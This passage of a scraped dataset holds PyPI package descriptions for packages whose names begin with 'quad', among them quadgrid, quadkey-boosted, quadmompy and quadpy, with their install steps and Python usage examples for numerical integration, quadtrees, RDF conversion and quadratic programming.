between quadcube res15 pixel number to ecliptic unit vectors.The code is a reimplementation of parts of the COBE DIRBE map binning routines provided by A.J. Banday. See theCOBE Explanatory Supplementfor more information.Installpip install quadcubeExampleimportquadcubequadcube.pix2vec(98477345)# >>> array([[0.37147827],# [0.62248052],# [0.6888555 ]])pixels=[315879751,238749305,408302824,290970621,427780527]quadcube.pix2vec(pixels)# >>> array([[ 0.90477257, -0.51544922, 0.91755844, 0.74030402, 0.98561299],# [-0.40535959, 0.10338045, -0.39665074, -0.00232418, -0.00949373],# [-0.13065298, 0.85066127, 0.02747185, -0.67226822, 0.16875101]])"} +{"package": "quade", "pacakge-description": "Meet Quade, the friendly QA tool for Django!Quade is a Django app that makes quality assurance testing better. It\nhandles repeatedly setting up the same data so you don\u2019t have to.InstallationCheck out theQuickstart!LinksSource on GithubDocumentation at Read the DocsHistory0.2.2 (2018-02-02)Fix dependency problems when installing without Celery (#29).Improve help text when not using Celery (#22).Use transparent logo (#31).0.2.1 (2018-01-16)Coerce fixtures\u2019 return value into text (#14).0.2.0 (2018-01-12)Moved celery dependency to an extra namedcelery(#13).0.1.1 (2018-01-05)Release on PyPI!0.1.0 (2018-01-05)Preparation for release."} +{"package": "quad-filter", "pacakge-description": "A couple of utility functions used to locate the regions of a cartesian\nmap where a condition is true or falseIn many cases, this is not the optimal way to generate such tiles,\nbut it may be of use if you only have access to a function that\nreturn true for an area.Seehttps://gitlab.com/jbrobertson/quad-filter/for details."} +{"package": "quad-form-ratio", "pacakge-description": "This package provides tools related to the distribution of ratios of\nquadratic forms in (zero mean) normal random variables. These are\ndefined byDefinition of RIncluded are functions for simulation, evaluation of the support, and\nsaddlepoint approximations to the cdfand\ninverse cdf."} +{"package": "quadgrid", "pacakge-description": "QuadgridThequadgridpackage provides a class and some convenience functions\nfor generating quadtree-based grids at arbitrary resolutions in pandas, geopandas and xarray formats for use in geospatial analysis and catastrophe risk modelling.OverviewQuadtree grids are a way of recursively partitioning a plane into\nnested quadrants, allowing for simple but efficient geocoding of\npoints.Some assumptions have been made to simplify the package:all coordinates are in decimal degreesall longitudes range from -180 to +180 degreesthe centre of the grid is at 0E, 0NThe package contains a single class,QuadGrid, which is used to\ngenerate grid objects. The class has methods to convert the grid into\ntabular (pandas DataFrame), vector (geopandas GeoDataFrame) and raster\n(xarray Dataset) formats which can be saved or used in further processing.Individual quadcells at a given resolution are labelled with unique\nquadtreeIDs (qids). In the simplified example below, the red point is in top-level cell '2', then cell '2', then '0' then '3' giving a nominal qid of '2203'. In practice, quadtrees lend themselves to a base-4 encoding, allowing them to be stored and processed efficiently as integers.Versions0.1.2Changed email address in pyproject.toml0.1.1Bug fix to ensure user-specified bounded grid is consistent with the global grid0.1.0First release"} +{"package": "quadipy", "pacakge-description": "quadipyquadipyis a python package to help transform structured data into RDF graph format.We builtquadipyto enable developers to build a config based ingestion pipeline to an RDF data store (think like FiveTran or Stitch but for RDF).quadipywon't explcitly handle connections to different systems but will allow you to configure the RDF data you want to create from any data source.quadipyleveragesRDFLibto pythonically structure RDF data.The goal with this project is to enable transforming any tabular data structure into graph based RDF data. We go into depthhereon how we have used this config based system to build out our internal knowledge graph at Vouch! You can also check out our talk at KGC'22 on YouTube:Modeling the startup ecosystem using a config based knowledge graph.An example below shows what we mean by translating some tabular data into RDF graph data.For a step by step walk-through of how to do this with more examples, visittutorialsDev SetupRun to set up your dev enviornmentmakesetupUsagefromquadipyimportGraphFormatConfigconfig=GraphFormatConfig.parse_file(\"path/to/config.json\")quads=[config.quadify(record)forrecordinrecords]# records is an Iterator[Dict]quadipycan work with a variety of different data sources as long as what is sent to thequadifymethod is aDictEachQuadcreated has a.to_tuple()method that converts it to a tuple to help facilitate working withRDFLibGraphsfromrdflibimportURIRef,GraphfromquadipyimportQuadquad=Quad(subject=URIRef(\"Alice\"),predicate=URIRef(\"knows\"),obj=URIRef(\"Bob\"),graph=None)g=Graph()g.add(quad.to_tuple())Setting up a GraphFormatConfigThe main value ofquadipycomes from theGraphFormatConfig, which takes in a few parameters to configure the transformation of your data into RDF graph format. We provide configuration examples in theexamplesdirectory to help you get started. The full list of fields that can be configured is described below:fieldrequireddescriptionsource_nameYesA string that is used to describe the source (i.e. \"wikipedia\" for data from wikipedia)primary_keyYesThis is the key in your data that will be used for the subject of each valuepredicate_mappingYesA mapping where the keys are column names in your data source, and values a nested dict that required apredicate_urikey mapped to the RDF predicate in the target location and an optionalobj_datatypekey that maps to a custom datatype (currently we support [literal,uriref, ordate]). Ifobj_datatypeisn't specified, it will default toliteralsubject_namespaceNoA string prepended to the quad's subject as a namespace, instead of just using the value of theprimary_key. For example, forprimary_key=123andsubject_namespace=wikipediathe values generated wouldNOTbeURIRef(\"123\")butURIRef(\"wikipedia/123\")graph_namespaceNoSimilar tosubject_namespacein that this will assign each fact to a named graph with thegraph_namespace. This is useful to store metadata about fact provenance in named graphs.date_fieldNoThe column in your dataset that the fact's \"date\" will be pulled from. When specified, the named graph field in each fact will be built from the date. For example ifdate_field=created_atandcreated_at='2021-01-01in the source data the graph field will beURIRef(\"2021-01-01\"). This can can work in conjunction withgraph_namespaceValidate Config filesTo make sure the config files are valid, run the CLI by using the commandquadipyvalidate{path}wherepathcould be the directory for all the config files, e.g.examplesor a single config file e.g.examples/simple.jsonThis script usespydanticvalidator to make sure the config file is a valid JSON file, the required fields are presented and thepredicate_uris are validURIs (\"valid\" defined by RDFLibhere)"} +{"package": "quadkey", "pacakge-description": "UNKNOWN"} +{"package": "quadkey-boosted", "pacakge-description": "quadkey-boostedDescriptionquadkey-boosted is a high-performance Python library that provides a powerful set of tools and functions for working with quadkeys, enabling seamless integration of tile-based mapping systems into your Python applications. Built on top of a blazing-fast C implementation, quadkey-boosted offers lightning-fast calculations, ensuring optimal performance even with large-scale datasets.Key FeaturesAvailable API'sConversionlat lng to QuadKeyQuadKey to lat lngQuadKey to BingTileBingTile to QuadKeyPolygon to quadQuadKeykeysQuadKey to MultipolygonOperationsget parentget childrensget K neighboursMetadataget average tile sizeget zoom levelget tile distance between two tilesWKT, GeoJson, WKB representation of quadkeyC based backend for fast calculationsCan handle various types of projectionsLicenseProject Status\u2705 Add Basic convertion API\u274e Implement advance geospatial apis\u274e Add support for projectionsWhat is a QuadKey?A QuadKey is a string representation of a tile's location in a quadtree hierarchy. It is used to index and address tiles at different levels of detail (zoom levels). The QuadKey system is based on dividing the Earth's surface into quadrants using a quadtree structure.For more details on the concept, please refer to\ntheMicrosoft Article About this.InstallationRequirementsThis library requiresPython 3.6or higher. To compile it from source, Cython is required in addition.using pippipinstallquadkey-boostedFrom sourcePrerequisites (Linux)gccFedora:dnf install @development-toolsUbuntu / Debian:apt install build-essentialpython3-develFedora:dnf install python3-develUbuntu / Debian:apt install python3-devPrerequisites (Windows)Visual C++ Build Tools 2015 (with Windows 10 SDK) (seehere)Build from source# Clone repogitclonehttps://github.com/ls-da3m0ns/quadkey-boosted# Create Virtual Environmentpython-mvenv./venvsourcevenv/bin/activate# Install dependenciespipinstall-rrequirements.txt# Compilepythonsetup.pysdistbdist_wheel# Installpipinstalldist/quadkey-0.0.1-cp38-cp38-linux_x86_64.whlUsageBasic Usageimportquadkeylat=47.641268lng=-122.125679zoom=15# Convert lat lng to quadkeyqk=quadkey.geo_to_quadkey(lat,lng,zoom)# Convert quadkey to lat lng## get top left cornerlat,lng=quadkey.quadkey_to_geo(qk,corner=0)## get bottom right cornerlat,lng=quadkey.quadkey_to_geo(qk,corner=2)# Convert quadkey to bboxbbox=quadkey.quadkey_to_bbox(qk)# Convert quadkey to Tiletl=quadkey.quadkey_to_tile(qk)# Conver quadkey to quadintqi=quadkey.quadkey_to_quadint(qk)# Convert lat lng to quadintqi=quadkey.geo_to_quadint(lat,lng,zoom)# get parent quadkeyparent=quadkey.get_parent(qk)ReferencesI would like to acknowledge the following repositories that served as references during the development of this project:pyquadkey2"} +{"package": "quad-mesh-simplify", "pacakge-description": "Quadric mesh simplificationA leightweight package for simplifying a mesh containing node features. The algorithm fromSurface Simplification Using Quadric Error Metricswas implemented using cython.Only python versions >= 3.6 are supportedInstallationwith pip$pipinstallquad_mesh_simplifyfrom source if distribution is not supportedDownload this repository and build the package by running:$pipinstall-rrequirements.txt\n$pythonsetup.pybuild_ext--inplace\n$pipinstall.UsageThis package provides one simple function to reduce a given mesh. This can be done for simple meshes or meshes with vertex features.simplify_mesh(positions, face, num_nodes, features=None, threshold=0., max_err=np.Infinity)positions(numpy array): array of shape [num_nodes x 3] containing the x, y, z position for each nodeface(numpy array): array of shape [num_faces x 3] containing the indices for each triangular facenum_nodes(int): number of nodes that the final mesh will have\nthreshold (number, optional): threshold of vertices distance to be a valid pairfeatures(numpy array): features for all nodes [num_nodes x feature_length]threshold(double): if the distance between two vertices is below this threshold, they are considered as valid pairs that can be merged.max_err(double): no vertices are merged that have an error higher than this number. IMPORTANT: if provided it is not guaranteed that the output will have less than num_nodes vertices.Returns:new_positions, new_face, (new_features)Reduce a simple meshfromquad_mesh_simplifyimportsimplify_meshnew_positions,new_face=simplify_mesh(positions,face,)Reduce a mesh with vertex featuresfromquad_mesh_simplifyimportsimplify_meshnew_positions,new_face=simplify_mesh(positions,face,,features=features)Reduce a mesh with a threshold for the minimal distancefromquad_mesh_simplifyimportsimplify_meshnew_positions,new_face=simplify_mesh(positions,face,,threshold=0.5)"} +{"package": "quadmoments", "pacakge-description": "No description available on PyPI."} +{"package": "quadmompy", "pacakge-description": "QuadMomPy is a library for all sorts of fun with moments, Gaussian quadratures, orthogonal polynomials and quadrature-based moment methods for the solution of spatially homogeneous population balance equations.InstallationThe QuadMomPy package can be easily installed bypip install quadmompyor from the project repositorypip install -e .A comprehensive documentation and additional examples are only available in the project repository on GitLab/GitHub. Usegit clone https://gitlab.com/puetzm/quadmompy.gitto clone the code from the GitLab repository orgit clone https://github.com/puetzmi/quadmompy.gitto clone from the project mirror on GitHub.The repository also includes aDockerfileto run tests and use the QuadMomPy package in a docker image.UsageA simple example of a moment inversion using the quadrature method of moments with the Wheeler algorithm to compute a Gaussian quadrature rule from a set of moments is given below.importnumpyasnpfromquadmompyimportqbmmfromquadmompy.qbmm.univariateimportQmomfromquadmompy.core.inversionimportWheeler# Create Qmom object using the Wheeler# algorithm for moment inversionqmom=qbmm.new(qbmm_type=Qmom,qbmm_setup={'inv_type':Wheeler})# Nodes `x` and weights `w` of a weighted# sum of degenerate distributionsx=np.array([-0.5,0.1,1.,1.4])w=np.array([0.15,0.4,0.4,0.05])# Compute moments of the distributionn=len(x)moments=np.vander(x,2*n).T[::-1]@w# Invert moments to obtain quadrature nodes and# weights, which should, in this particular# equal the nodes and weights defined above.x_quad,w_quad=qmom.moment_inversion(moments)print(f\"x ={x_quad}\")print(f\"w ={w_quad}\")For more examples of how to use the numerous classes provided with this package, see thetestsdirectory and theexamplesdirectory in the project repository on GitLab (https://gitlab.com/puetzm/quadmompy.git) and the project mirror on GitHub(https://github.com/puetzmi/quadmompy.git).LicenseCopyright (c) 2022 Michele Puetz.This program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, version 3.This program is distributed in the hope that it will be useful, but\nWITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\nGeneral Public License for more details.You should have received a copy of the GNU General Public License\nalong with this program. If not, see ."} +{"package": "quadprog", "pacakge-description": "Minimize 1/2 x^T G x - a^T xSubject to C.T x >= bThis routine uses the the Goldfarb/Idnani dual algorithm [1].ReferencesD. Goldfarb and A. Idnani (1983). A numerically stable dual\nmethod for solving strictly convex quadratic programs.\nMathematical Programming, 27, 1-33."} +{"package": "quadprog-wheel", "pacakge-description": "Minimize 1/2 x^T G x - a^T xSubject to C.T x >= bThis routine uses the the Goldfarb/Idnani dual algorithm [1].ReferencesD. Goldfarb and A. Idnani (1983). A numerically stable dual\nmethod for solving strictly convex quadratic programs.\nMathematical Programming, 27, 1-33."} +{"package": "quadproj", "pacakge-description": "quadprojA simple library to project a point onto a quadratic surface, orquadric.How to install quadproj?It is a one-liner!python3-mpipinstallquadprojSeeinstallation pagefor further information and the requirements.DocumentationThe documentation is hosted on GitLab:https://loicvh.gitlab.io/quadprojHow does quadproj works?The projection is obtained by computing exhaustively all KKT point from the optimization problem defining the projection. The authors of[1]show that for non-cylindrical central quadrics, the solutions belong to the KKT points that consist in the intersection between:a unique root of a nonlinear function on a specific interval;a set of closed-form points.Either set can be empty but for a nonempty quadric, at least one is nonempty and contains (one of the) projections.The full explanation is provided in[1].How to use quadproj?See thequickstartpage or theAPI documentation.DependenciesSeerequirements.txt.[1](2021) L. Van Hoorebeeck, P.-A. Absil and A. Papavasiliou, \u201cProjection onto quadratic hypersurfaces\u201d, submitted. (preprint,abstract/BibTex)"} +{"package": "quadpy", "pacakge-description": "Your one-stop shop for numerical integration in Python.More than 1500 numerical integration schemes forline segments,circles,disks,triangles,quadrilaterals,spheres,balls,tetrahedra,hexahedra,wedges,pyramids,n-spheres,n-balls,n-cubes,n-simplices,the 1D half-space with weight functions exp(-r),the 2D space with weight functions exp(-r),the 3D space with weight functions exp(-r),the nD space with weight functions exp(-r),the 1D space with weight functions exp(-r2),the 2D space with weight functions exp(-r2),the 3D space with weight functions exp(-r2),\nandthe nD space with weight functions exp(-r2),\nfor fast integration of real-, complex-, and vector-valued functions.InstallationInstall quadpyfrom PyPIwithpip install quadpySeehereon how to get a license.Using quadpyQuadpy provides integration schemes for many different 1D, 2D, even nD domains.To start off easy: If you'd numerically integrate any function over any given\n1D interval, doimportnumpyasnpimportquadpydeff(x):returnnp.sin(x)-xval,err=quadpy.quad(f,0.0,6.0)This is likescipywith the addition that quadpy handles complex-, vector-, matrix-valued integrands,\nand \"intervals\" in spaces of arbitrary dimension.To integrate over atriangle, doimportnumpyasnpimportquadpydeff(x):returnnp.sin(x[0])*np.sin(x[1])triangle=np.array([[0.0,0.0],[1.0,0.0],[0.7,0.5]])# get a \"good\" scheme of degree 10scheme=quadpy.t2.get_good_scheme(10)val=scheme.integrate(f,triangle)Most domains haveget_good_scheme(degree). If you would like to use a\nparticular scheme, you can pick one from the dictionaryquadpy.t2.schemes.All schemes havescheme.pointsscheme.weightsscheme.degreescheme.sourcescheme.test_tolerancescheme.show()scheme.integrate(# ...)and many havescheme.points_symbolicscheme.weights_symbolicYou can explore schemes on the command line with, e.g.,quadpy info s2 rabinowitz_richter_3\n name: Rabinowitz-Richter 2\n source: Perfectly Symmetric Two-Dimensional Integration Formulas with Minimal Numbers of Points\n Philip Rabinowitz, Nira Richter\n Mathematics of Computation, vol. 23, no. 108, pp. 765-779, 1969\n https://doi.org/10.1090/S0025-5718-1969-0258281-4\n degree: 9\n num points/weights: 21\n max/min weight ratio: 7.632e+01\n test tolerance: 9.417e-15\n point position: outside\n all weights positive: TrueAlso tryquadpy show!quadpy is fully vectorized, so if you like to compute the integral of a function on many\ndomains at once, you can provide them all in oneintegrate()call, e.g.,# shape (3, 5, 2), i.e., (corners, num_triangles, xy_coords)triangles=np.stack([[[0.0,0.0],[1.0,0.0],[0.0,1.0]],[[1.2,0.6],[1.3,0.7],[1.4,0.8]],[[26.0,31.0],[24.0,27.0],[33.0,28]],[[0.1,0.3],[0.4,0.4],[0.7,0.1]],[[8.6,6.0],[9.4,5.6],[7.5,7.4]],],axis=-2,)The same goes for functions with vectorized output, e.g.,deff(x):return[np.sin(x[0]),np.sin(x[1])]More examples undertest/examples_test.py.Read more about the dimensionality of the input/output arraysin the\nwiki.Advanced topics:Adaptive quadratureCreating your own Gauss schemetanh-sinh quadratureSchemesLine segment (C1)Chebyshev-Gauss (type 1 and 2, arbitrary degree)Clenshaw-Curtis (arbitrary degree)Fej\u00e9r (type 1 and 2, arbitrary degree)Gauss-Jacobi (arbitrary degree)Gauss-Legendre (arbitrary degree)Gauss-Lobatto (arbitrary degree)Gauss-Kronrod (arbitrary degree)Gauss-Patterson (9 nested schemes up to degree 767)Gauss-Radau (arbitrary degree)Newton-Cotes (open and closed, arbitrary degree)See\nherefor how to generate Gauss formulas for your own weight functions.Example:importnumpyasnpimportquadpyscheme=quadpy.c1.gauss_patterson(5)scheme.show()val=scheme.integrate(lambdax:np.exp(x),[0.0,1.0])1D half-space with weight function exp(-r) (E1r)Generalized Gauss-LaguerreExample:importquadpyscheme=quadpy.e1r.gauss_laguerre(5,alpha=0)scheme.show()val=scheme.integrate(lambdax:x**2)1D space with weight function exp(-r2) (E1r2)Gauss-Hermite (arbitrary degree)Genz-Keister (1996, 8 nested schemes up to degree 67)Example:importquadpyscheme=quadpy.e1r2.gauss_hermite(5)scheme.show()val=scheme.integrate(lambdax:x**2)Circle (U2)Krylov (1959, arbitrary degree)Example:importnumpyasnpimportquadpyscheme=quadpy.u2.get_good_scheme(7)scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),[0.0,0.0],1.0)Triangle (T2)Apart from the classical centroid, vertex, and seven-point schemes we haveHammer-Marlowe-Stroud(1956, 5 schemes up to\ndegree 5)Albrecht-Collatz(1958, degree 3)Stroud(1971, conical product scheme of degree 7)Franke(1971, 2 schemes of degree 7)Strang-Fix/Cowper(1973, 10 schemes up to degree\n7),Lyness-Jespersen(1975, 21 schemes up to degree 11,\ntwo of which are used inTRIEX),Lether(1976, degree 2n-2, arbitrary n, not symmetric),Hillion(1977, 10 schemes up to degree 3),Laursen-Gellert(1978, 17 schemes up to degree 10),CUBTRI(Laurie, 1982, degree 8),Dunavant(1985, 20 schemes up to degree 20),Cools-Haegemans(1987, degrees 8 and 11),Gatermann(1988, degree 7)Berntsen-Espelid(1990, 4 schemes of degree 13, the\nfirst one beingDCUTRI),Liu-Vinokur(1998, 13 schemes up to degree 5),Griener-Schmid, (1999, 2 schemes of degree 6),Walkington(2000, 5 schemes up to degree 5),Wandzura-Xiao(2003, 6 schemes up to degree 30),Taylor-Wingate-Bos(2005, 5 schemes up to degree\n14),Zhang-Cui-Liu(2009, 3 schemes up to degree 20),Xiao-Gimbutas(2010, 50 schemes up to degree 50),Vioreanu-Rokhlin(2014, 20 schemes up to degree 62),Williams-Shunn-Jameson(2014, 8 schemes up to\ndegree 12),Witherden-Vincent(2015, 19 schemes up to degree 20),Papanicolopulos(2016, 27 schemes up to degree 25),all schemes for the n-simplex.Example:importnumpyasnpimportquadpyscheme=quadpy.t2.get_good_scheme(12)scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),[[0.0,0.0],[1.0,0.0],[0.5,0.7]])Disk (S2)Radon (1948, degree 5)Peirce (1956, 3 schemes up to degree 11)Peirce (1957, arbitrary degree)Albrecht-Collatz (1958, degree 3)Hammer-Stroud (1958, 8 schemes up to degree 15)Albrecht (1960, 8 schemes up to degree 17)Mysovskih (1964, 3 schemes up to degree 15)Rabinowitz-Richter (1969, 6 schemes up to degree 15)Lether (1971, arbitrary degree)Piessens-Haegemans (1975, 1 scheme of degree 9)Haegemans-Piessens (1977, degree 9)Cools-Haegemans (1985, 4 schemes up to degree 13)Wissmann-Becker (1986, 3 schemes up to degree 8)Kim-Song (1997, 15 schemes up to degree 17)Cools-Kim (2000, 3 schemes up to degree 21)Luo-Meng (2007, 6 schemes up to degree 17)Takaki-Forbes-Rolland (2022, 19 schemes up to degree 77)all schemes from the n-ballExample:importnumpyasnpimportquadpyscheme=quadpy.s2.get_good_scheme(6)scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),[0.0,0.0],1.0)Quadrilateral (C2)Maxwell(1890, degree 7)Burnside(1908, degree 5)Irwin(1923, 3 schemes up to degree 5)Tyler(1953, 3 schemes up to degree 7)Hammer-Stroud(1958, 3 schemes up to degree 7)Albrecht-Collatz(1958, 4 schemes up to degree 5)Miller(1960, degree 1, degree 11 for harmonic integrands)Meister(1966, degree 7)Phillips(1967, degree 7)Rabinowitz-Richter(1969, 6 schemes up to degree 15)Franke(1971, 10 schemes up to degree 9)Piessens-Haegemans(1975, 2 schemes of degree 9)Haegemans-Piessens(1977, degree 7)Schmid(1978, 3 schemes up to degree 6)Cools-Haegemans(1985, 6 schemes up to degree 17)Dunavant(1985, 11 schemes up to degree 19)Morrow-Patterson(1985, 2 schemes up to degree 20, single precision)Cohen-Gismalla, (1986, 2 schemes up to degree 3)Wissmann-Becker(1986, 6 schemes up to degree 8)Cools-Haegemans(1988, 2 schemes up to degree 13)Waldron(1994, infinitely many schemes of degree 3)Sommariva(2012, 55 schemes up to degree 55)Witherden-Vincent(2015, 11 schemes up to degree 21)products of line segment schemesall schemes from the n-cubeExample:importnumpyasnpimportquadpyscheme=quadpy.c2.get_good_scheme(7)val=scheme.integrate(lambdax:np.exp(x[0]),[[[0.0,0.0],[1.0,0.0]],[[0.0,1.0],[1.0,1.0]]],)The points are specified in an array of shape (2, 2, ...) such thatarr[0][0]is the lower left corner,arr[1][1]the upper right. If your c2\nhas its sides aligned with the coordinate axes, you can use the convenience\nfunctionquadpy.c2.rectangle_points([x0,x1],[y0,y1])to generate the array.2D space with weight function exp(-r) (E2r)Stroud-Secrest(1963, 2 schemes up to degree 7)Rabinowitz-Richter(1969, 4 schemes up to degree 15)Stroud(1971, degree 4)Haegemans-Piessens(1977, 2 schemes up to degree 9)Cools-Haegemans(1985, 3 schemes up to degree 13)all schemes from the nD space with weight function exp(-r)Example:importquadpyscheme=quadpy.e2r.get_good_scheme(5)scheme.show()val=scheme.integrate(lambdax:x[0]**2)2D space with weight function exp(-r2) (E2r2)Stroud-Secrest(1963, 2 schemes up to degree 7)Rabinowitz-Richter(1969, 5 schemes up to degree 15)Stroud(1971, 3 schemes up to degree 7)Haegemans-Piessens(1977, 2 schemes of degree 9)Cools-Haegemans(1985, 3 schemes up to degree 13)Van Zandt (2019, degree 6)all schemes from the nD space with weight function exp(-r2)Example:importquadpyscheme=quadpy.e2r2.get_good_scheme(3)scheme.show()val=scheme.integrate(lambdax:x[0]**2)Sphere (U3)Albrecht-Collatz(1958, 5 schemes up to degree 7)McLaren(1963, 10 schemes up to degree 14)Lebedev(1976, 34 schemes up to degree 131)Ba\u017eant-Oh(1986, 3 schemes up to degree 13)Heo-Xu(2001, 27 schemes up to degree 39)Fliege-Maier(2007, 4 schemes up to degree 4,\nsingle-precision)all schemes from the n-sphereExample:importnumpyasnpimportquadpyscheme=quadpy.u3.get_good_scheme(19)# scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),[0.0,0.0,0.0],1.0)Integration on the sphere can also be done for functions defined in spherical\ncoordinates:importnumpyasnpimportquadpydeff(theta_phi):theta,phi=theta_phireturnnp.sin(phi)**2*np.sin(theta)scheme=quadpy.u3.get_good_scheme(19)val=scheme.integrate_spherical(f)Ball (S3)Ditkin(1948, 3 schemes up to degree 7)Hammer-Stroud(1958, 6 schemes up to degree 7)Mysovskih(1964, degree 7)Stroud(1971, 2 schemes up to degree 14)Van Zandt (2020, degree 4)all schemes from the n-ballExample:importnumpyasnpimportquadpyscheme=quadpy.s3.get_good_scheme(4)# scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),[0.0,0.0,0.0],1.0)Tetrahedron (T3)Hammer-Marlowe-Stroud(1956, 3 schemes up to degree 3, also appearing inHammer-Stroud)Stroud(1971, degree 7)Yu(1984, 5 schemes up to degree 6)Keast(1986, 10 schemes up to degree 8)Beckers-Haegemans(1990, degrees 8 and 9)Gatermann(1992, degree 5)Liu-Vinokur(1998, 14 schemes up to degree 5)Walkington(2000, 6 schemes up to degree 7)Zhang-Cui-Liu(2009, 2 schemes up to degree 14)Xiao-Gimbutas(2010, 15 schemes up to degree 15)Shunn-Ham(2012, 6 schemes up to degree 7)Vioreanu-Rokhlin(2014, 10 schemes up to degree 13)Williams-Shunn-Jameson(2014, 1 scheme with\ndegree 9)Witherden-Vincent(2015, 9 schemes up to degree 10)Ja\u015bkowiec-Sukumar(2020, 21 schemes up to degree 20)all schemes for the n-simplex.Example:importnumpyasnpimportquadpyscheme=quadpy.t3.get_good_scheme(5)# scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),[[0.0,0.0,0.0],[1.0,0.0,0.0],[0.5,0.7,0.0],[0.3,0.9,1.0]],)Hexahedron (C3)Sadowsky(1940, degree 5)Tyler(1953, 2 schemes up to degree 5)Hammer-Wymore(1957, degree 7)Albrecht-Collatz(1958, degree 3)Hammer-Stroud(1958, 6 schemes up to degree 7)Mustard-Lyness-Blatt(1963, 6 schemes up to degree 5)Stroud(1967, degree 5)Sarma-Stroud(1969, degree 7)Witherden-Vincent(2015, 7 schemes up to degree degree 11)all schemes from the n-cubeProduct schemes derived from line segment schemesExample:importnumpyasnpimportquadpyscheme=quadpy.c3.product(quadpy.c1.newton_cotes_closed(3))# scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),quadpy.c3.cube_points([0.0,1.0],[-0.3,0.4],[1.0,2.1]),)Pyramid (P3)Felippa(2004, 9 schemes up to degree 5)Example:importnumpyasnpimportquadpyscheme=quadpy.p3.felippa_5()val=scheme.integrate(lambdax:np.exp(x[0]),[[0.0,0.0,0.0],[1.0,0.0,0.0],[0.5,0.7,0.0],[0.3,0.9,0.0],[0.0,0.1,1.0],],)Wedge (W3)Felippa(2004, 6 schemes up to degree 6)Kubatko-Yeager-Maggi(2013, 21 schemes up to\ndegree 9)Example:importnumpyasnpimportquadpyscheme=quadpy.w3.felippa_3()val=scheme.integrate(lambdax:np.exp(x[0]),[[[0.0,0.0,0.0],[1.0,0.0,0.0],[0.5,0.7,0.0]],[[0.0,0.0,1.0],[1.0,0.0,1.0],[0.5,0.7,1.0]],],)3D space with weight function exp(-r) (E3r)Stroud-Secrest(1963, 5 schemes up to degree 7)all schemes from the nD space with weight function\nexp(-r)Example:importquadpyscheme=quadpy.e3r.get_good_scheme(5)# scheme.show()val=scheme.integrate(lambdax:x[0]**2)3D space with weight function exp(-r2) (E3r2)Stroud-Secrest(1963, 7 schemes up to degree 7)Stroud(1971, scheme of degree 14)Van Zandt (2020, degree 4)all schemes from the nD space with weight function\nexp(-r2)Example:importquadpyscheme=quadpy.e3r2.get_good_scheme(6)# scheme.show()val=scheme.integrate(lambdax:x[0]**2)n-Simplex (Tn)Lauffer(1955, 5 schemes up to degree 5)Hammer-Stroud(1956, 3 schemes up to degree 3)Stroud(1964, degree 3)Stroud(1966, 7 schemes of degree 3)Stroud(1969, degree 5)Silvester(1970, arbitrary degree),Grundmann-M\u00f6ller(1978, arbitrary degree)Walkington(2000, 5 schemes up to degree 7)Example:importnumpyasnpimportquadpydim=4scheme=quadpy.tn.grundmann_moeller(dim,3)val=scheme.integrate(lambdax:np.exp(x[0]),np.array([[0.0,0.0,0.0,0.0],[1.0,2.0,0.0,0.0],[0.0,1.0,0.0,0.0],[0.0,3.0,1.0,0.0],[0.0,0.0,4.0,1.0],]),)n-Sphere (Un)Stroud(1967, degree 7)Stroud(1969, 3 <= n <= 16, degree 11)Stroud(1971, 6 schemes up to degree 5)Dobrodeev(1978, n >= 2, degree 5)Mysovskikh(1980, 2 schemes up to degree 5)Example:importnumpyasnpimportquadpydim=4scheme=quadpy.un.dobrodeev_1978(dim)val=scheme.integrate(lambdax:np.exp(x[0]),np.zeros(dim),1.0)n-Ball (Sn)Stroud(1957, degree 2)Hammer-Stroud(1958, 2 schemes up to degree 5)Stroud(1966, 4 schemes of degree 5)Stroud(1967, 4 <= n <= 7, 2 schemes of degree 5)Stroud(1967, n >= 3, 3 schemes of degree 7)Stenger(1967, 6 schemes up to degree 11)McNamee-Stenger(1967, 6 schemes up to degree 9)Dobrodeev(1970, n >= 3, degree 7)Dobrodeev(1978, 2 <= n <= 20, degree 5)Stoyanova(1997, n >= 5, degree 7)Example:importnumpyasnpimportquadpydim=4scheme=quadpy.sn.dobrodeev_1970(dim)val=scheme.integrate(lambdax:np.exp(x[0]),np.zeros(dim),1.0)n-Cube (Cn)Ewing(1941, degree 3)Tyler(1953, degree 3)Stroud(1957, 2 schemes up to degree 3)Hammer-Stroud(1958, degree 5)Mustard-Lyness-Blatt(1963, degree 5)Thacher(1964, degree 2)Stroud(1966, 4 schemes of degree 5)Phillips(1967, degree 7)McNamee-Stenger(1967, 6 schemes up to degree 9)Stroud(1968, degree 5)Dobrodeev(1970, n >= 5, degree 7)Dobrodeev(1978, n >= 2, degree 5)Cools-Haegemans(1994, 2 schemes up to degree 5)Example:importnumpyasnpimportquadpydim=4scheme=quadpy.cn.stroud_cn_3_3(dim)val=scheme.integrate(lambdax:np.exp(x[0]),quadpy.cn.ncube_points([0.0,1.0],[0.1,0.9],[-1.0,1.0],[-1.0,-0.5]),)nD space with weight function exp(-r) (Enr)Stroud-Secrest(1963, 4 schemes up to degree 5)McNamee-Stenger(1967, 6 schemes up to degree 9)Stroud(1971, 2 schemes up to degree 5)Example:importquadpydim=4scheme=quadpy.enr.stroud_enr_5_4(dim)val=scheme.integrate(lambdax:x[0]**2)nD space with weight function exp(-r2) (Enr2)Stroud-Secrest(1963, 4 schemes up to degree 5)McNamee-Stenger(1967, 6 schemes up to degree 9)Stroud(1967, 2 schemes of degree 5)Stroud(1967, 3 schemes of degree 7)Stenger(1971, 6 schemes up to degree 11, varying dimensionality restrictions)Stroud(1971, 5 schemes up to degree 5)Phillips(1980, degree 5)Cools-Haegemans(1994, 3 schemes up to degree 7)Lu-Darmofal(2004, degree 5)Xiu(2008, degree 2)Example:importquadpydim=4scheme=quadpy.enr2.stroud_enr2_5_2(dim)val=scheme.integrate(lambdax:x[0]**2)"} +{"package": "quadpy-gpl", "pacakge-description": "Your one-stop shop for numerical integration in Python.More than 1500 numerical integration schemes forline segments,circles,disks,triangles,quadrilaterals,spheres,balls,tetrahedra,hexahedra,wedges,pyramids,n-spheres,n-balls,n-cubes,n-simplices,the 1D half-space with 